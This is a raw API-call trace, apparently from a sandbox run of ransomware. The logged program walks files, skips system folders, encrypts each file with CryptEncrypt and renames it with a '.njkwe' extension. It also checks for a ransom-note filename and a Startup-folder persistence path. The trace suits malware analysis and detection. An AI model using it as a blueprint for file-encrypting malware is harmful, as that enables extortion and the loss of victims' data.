[0077.058] GetProcessHeap () returned 0xbe0000 [0077.058] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.058] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2c8, lpOverlapped=0x0) returned 1 [0077.060] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd38, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.060] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2c8, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2c8, lpOverlapped=0x0) returned 1 [0077.060] GetProcessHeap () returned 0xbe0000 [0077.060] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.060] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.060] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.060] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.061] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.061] CloseHandle (hObject=0x43c) returned 1 [0077.061] GetProcessHeap () returned 0xbe0000 [0077.061] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.061] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\16__Connections_Cellular_Optus (Australia)_i7$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 180 [0077.061] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\16__Connections_Cellular_Optus (Australia)_i7$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\16__connections_cellular_optus (australia)_i7$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\16__Connections_Cellular_Optus (Australia)_i7$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\16__connections_cellular_optus (australia)_i7$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.061] GetProcessHeap () returned 0xbe0000 [0077.062] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.062] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x906742d4, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x906742d4, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x906742d4, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2be, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="170__Connections_Cellular_Claro (Honduras)_i0$(__MVID)@WAP.provxml", cAlternateFileName="170__C~1.PRO")) returned 1 [0077.062] lstrcmpiW (lpString1="170__Connections_Cellular_Claro (Honduras)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0077.062] lstrcmpiW (lpString1="170__Connections_Cellular_Claro (Honduras)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0077.062] lstrcmpiW (lpString1="170__Connections_Cellular_Claro (Honduras)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0077.062] lstrcmpiW (lpString1="170__Connections_Cellular_Claro (Honduras)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0077.062] lstrcmpiW (lpString1="170__Connections_Cellular_Claro (Honduras)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0077.062] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\170__Connections_Cellular_Claro (Honduras)_i0$(__MVID)@WAP.provxml") returned 160 [0077.062] StrStrIW (lpFirst="170__Connections_Cellular_Claro (Honduras)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0077.062] lstrcmpW (lpString1="170__Connections_Cellular_Claro (Honduras)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.062] lstrcmpW (lpString1="170__Connections_Cellular_Claro (Honduras)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0077.062] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\170__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.062] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\170__Connections_Cellular_Claro (Honduras)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\170__connections_cellular_claro (honduras)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.063] GetTickCount () returned 0x11539aa [0077.063] GetTickCount () returned 0x11539aa [0077.063] GetTickCount () returned 0x11539aa [0077.063] GetTickCount () returned 0x11539aa [0077.063] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.063] GetProcessHeap () returned 0xbe0000 [0077.063] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.063] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2be, lpOverlapped=0x0) returned 1 [0077.065] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd42, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.065] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2be, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2be, lpOverlapped=0x0) returned 1 [0077.065] GetProcessHeap () returned 0xbe0000 [0077.065] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.065] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.065] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.065] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.065] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.065] CloseHandle (hObject=0x43c) returned 1 [0077.065] GetProcessHeap () returned 0xbe0000 [0077.065] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.065] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\170__Connections_Cellular_Claro (Honduras)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 180 [0077.065] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\170__Connections_Cellular_Claro (Honduras)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\170__connections_cellular_claro (honduras)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\170__Connections_Cellular_Claro (Honduras)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\170__connections_cellular_claro (honduras)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.066] GetProcessHeap () returned 0xbe0000 [0077.066] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.066] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9069a53c, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x9069a53c, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x9069a53c, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2cd, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="171__Connections_Cellular_Claro (Honduras)_i1$(__MVID)@WAP.provxml", cAlternateFileName="171__C~1.PRO")) returned 1 [0077.066] lstrcmpiW (lpString1="171__Connections_Cellular_Claro (Honduras)_i1$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0077.066] lstrcmpiW (lpString1="171__Connections_Cellular_Claro (Honduras)_i1$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0077.066] lstrcmpiW (lpString1="171__Connections_Cellular_Claro (Honduras)_i1$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0077.066] lstrcmpiW (lpString1="171__Connections_Cellular_Claro (Honduras)_i1$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0077.066] lstrcmpiW (lpString1="171__Connections_Cellular_Claro (Honduras)_i1$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0077.066] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\171__Connections_Cellular_Claro (Honduras)_i1$(__MVID)@WAP.provxml") returned 160 [0077.066] StrStrIW (lpFirst="171__Connections_Cellular_Claro (Honduras)_i1$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0077.066] lstrcmpW (lpString1="171__Connections_Cellular_Claro (Honduras)_i1$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.066] lstrcmpW (lpString1="171__Connections_Cellular_Claro (Honduras)_i1$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0077.067] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\171__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.067] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\171__Connections_Cellular_Claro (Honduras)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\171__connections_cellular_claro (honduras)_i1$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.067] GetTickCount () returned 0x11539aa [0077.067] GetTickCount () returned 0x11539aa [0077.067] GetTickCount () returned 0x11539aa [0077.067] GetTickCount () returned 0x11539aa [0077.067] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.067] GetProcessHeap () returned 0xbe0000 [0077.067] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.067] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2cd, lpOverlapped=0x0) returned 1 [0077.096] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd33, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.096] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2cd, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2cd, lpOverlapped=0x0) returned 1 [0077.096] GetProcessHeap () returned 0xbe0000 [0077.096] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.096] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.096] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.096] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.096] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.097] CloseHandle (hObject=0x43c) returned 1 [0077.097] GetProcessHeap () returned 0xbe0000 [0077.097] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.097] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\171__Connections_Cellular_Claro (Honduras)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 180 [0077.097] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\171__Connections_Cellular_Claro (Honduras)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\171__connections_cellular_claro (honduras)_i1$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\171__Connections_Cellular_Claro (Honduras)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\171__connections_cellular_claro (honduras)_i1$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.098] GetProcessHeap () returned 0xbe0000 [0077.098] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.098] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9069a53c, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x9069a53c, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x9069a53c, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x28a, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="172__Connections_Cellular_TIGO (Honduras)_i0$(__MVID)@WAP.provxml", cAlternateFileName="172__C~1.PRO")) returned 1 [0077.098] lstrcmpiW (lpString1="172__Connections_Cellular_TIGO (Honduras)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0077.098] lstrcmpiW (lpString1="172__Connections_Cellular_TIGO (Honduras)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0077.098] lstrcmpiW (lpString1="172__Connections_Cellular_TIGO (Honduras)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0077.098] lstrcmpiW (lpString1="172__Connections_Cellular_TIGO (Honduras)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0077.098] lstrcmpiW (lpString1="172__Connections_Cellular_TIGO (Honduras)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0077.098] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\172__Connections_Cellular_TIGO (Honduras)_i0$(__MVID)@WAP.provxml") returned 159 [0077.098] StrStrIW (lpFirst="172__Connections_Cellular_TIGO (Honduras)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0077.098] lstrcmpW (lpString1="172__Connections_Cellular_TIGO (Honduras)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.098] lstrcmpW (lpString1="172__Connections_Cellular_TIGO (Honduras)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0077.098] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\172__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.098] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\172__Connections_Cellular_TIGO (Honduras)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\172__connections_cellular_tigo (honduras)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.098] GetTickCount () returned 0x11539c9 [0077.098] GetTickCount () returned 0x11539c9 [0077.098] GetTickCount () returned 0x11539c9 [0077.098] GetTickCount () returned 0x11539c9 [0077.098] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.098] GetProcessHeap () returned 0xbe0000 [0077.098] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.099] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x28a, lpOverlapped=0x0) returned 1 [0077.100] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd76, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.100] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x28a, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x28a, lpOverlapped=0x0) returned 1 [0077.100] GetProcessHeap () returned 0xbe0000 [0077.100] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.100] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.100] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.100] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.100] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.100] CloseHandle (hObject=0x43c) returned 1 [0077.104] GetProcessHeap () returned 0xbe0000 [0077.104] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.104] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\172__Connections_Cellular_TIGO (Honduras)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 179 [0077.104] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\172__Connections_Cellular_TIGO (Honduras)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\172__connections_cellular_tigo (honduras)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\172__Connections_Cellular_TIGO (Honduras)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\172__connections_cellular_tigo (honduras)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.104] GetProcessHeap () returned 0xbe0000 [0077.104] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.104] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9069a53c, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x9069a53c, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x9069a53c, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x289, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="173__Connections_Cellular_TIGO (Honduras)_i1$(__MVID)@WAP.provxml", cAlternateFileName="173__C~1.PRO")) returned 1 [0077.104] lstrcmpiW (lpString1="173__Connections_Cellular_TIGO (Honduras)_i1$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0077.104] lstrcmpiW (lpString1="173__Connections_Cellular_TIGO (Honduras)_i1$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0077.105] lstrcmpiW (lpString1="173__Connections_Cellular_TIGO (Honduras)_i1$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0077.105] lstrcmpiW (lpString1="173__Connections_Cellular_TIGO (Honduras)_i1$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0077.105] lstrcmpiW (lpString1="173__Connections_Cellular_TIGO (Honduras)_i1$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0077.105] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\173__Connections_Cellular_TIGO (Honduras)_i1$(__MVID)@WAP.provxml") returned 159 [0077.105] StrStrIW (lpFirst="173__Connections_Cellular_TIGO (Honduras)_i1$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0077.105] lstrcmpW (lpString1="173__Connections_Cellular_TIGO (Honduras)_i1$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.105] lstrcmpW (lpString1="173__Connections_Cellular_TIGO (Honduras)_i1$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0077.105] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\173__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start 